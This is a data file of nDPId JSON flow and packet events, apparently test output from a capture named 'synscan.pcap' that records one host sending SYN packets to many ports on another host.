+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1057,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1048,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsY\/8AADoGqnOsEAAIQA2GNIzSCo7dUoMYAAAAAGACDAAiAQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1058,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1049,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1049,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsrsYAAC4Ga6ysEAAIQA2GNIzTgA\/dU4MZAAAAAGACDACsfAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1059,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1050,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1059,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1050,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsvEIAADEGWzCsEAAIQA2GNIzTBaPdU4MZAAAAAGACCAAq6QAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1060,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1051,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1060,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1051,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAs7Q8AAC0GLmOsEAAIQA2GNIzTTVndU4MZAAAAAGACCADjMgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1061,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1052,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5802,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1052,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsVA8AACgGzGOsEAAIQA2GNIzTFqrdU4MZAAAAAGACBAAd4gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1062,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1053,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1053,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsbTMAADEGqj+sEAAIQA2GNIzTI3ndU4MZAAAAAGACCAANEwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1063,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1054,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1063,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1054,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAspFIAADsGaSCsEAAIQA2GNIzTBHHdU4MZAAAAAGACEAAkGwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1064,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1055,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1064,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1055,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsG4AAACwGAPOsEAAIQA2GNIzTB2zdU4MZAAAAAGACBAAtIAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1065,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1056,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1065,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1056,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsIdAAAC0G+aKsEAAIQA2GNIzTEVvdU4MZAAAAAGACCAAfMQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1066,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1057,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1066,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1057,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/2AAACcGIhKsEAAIQA2GNIzTxUTdU4MZAAAAAGACEABjRwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1067,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1067,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsRwMAACYG22+sEAAIQA2GNIzTCizdU4MZAAAAAGACDAAiYAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1068,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1059,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1068,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1059,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsxZYAADcGS9ysEAAIQA2GNIzTBCPdU4MZAAAAAGACEAAkaQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1069,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1060,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1069,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1060,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsUyoAACsGykisEAAIQA2GNIzTKXjdU4MZAAAAAGACEAD\/EwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1070,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1061,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1070,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1061,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsPPsAADQG13esEAAIQA2GNIzTLuDdU4MZAAAAAGACBAAFrAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1071,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1062,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":31038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1071,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1062,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsIK8AADIG9cOsEAAIQA2GNIzTeT7dU4MZAAAAAGACDACzTQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1072,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1063,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1072,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1063,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/sQAADgGEa6sEAAIQA2GNIzSIyrdUoMYAAAAAGACBAARZQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1073,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1064,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1073,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1064,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsVMoAADsGuKisEAAIQA2GNIzSF27dUoMYAAAAAGACEAARIQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1074,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1065,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1074,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1065,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsq0AAADQGaTKsEAAIQA2GNIzSJR\/dUoMYAAAAAGACBAAPcAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1075,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1066,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1062,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1075,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1066,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/zAAADgGEUKsEAAIQA2GNIzSBCbdUoMYAAAAAGACBAAwaQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1076,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1067,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1076,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1067,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAs2mcAADEGPQusEAAIQA2GNIzSBMHdUoMYAAAAAGACCAArzgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1077,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1068,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1077,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1068,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsXjcAACwGvjusEAAIQA2GNIzSw1HdUoMYAAAAAGACBABxPQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1078,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1069,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3325,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1078,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1069,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsxg8AACsGV2OsEAAIQA2GNIzSDP3dUoMYAAAAAGACEAAbkgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1079,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1070,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1079,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1070,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsAGYAADsGDQ2sEAAIQA2GNIzSA\/PdUoMYAAAAAGACEAAknAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1071,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1117,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1071,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsB0kAADQGDSqsEAAIQA2GNIzSBF3dUoMYAAAAAGACBAAwMgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1081,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1072,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1533,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1072,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsslAAAC0GaSKsEAAIQA2GNIzSBf3dUoMYAAAAAGACCAAqkgAAAgQFtA=="} 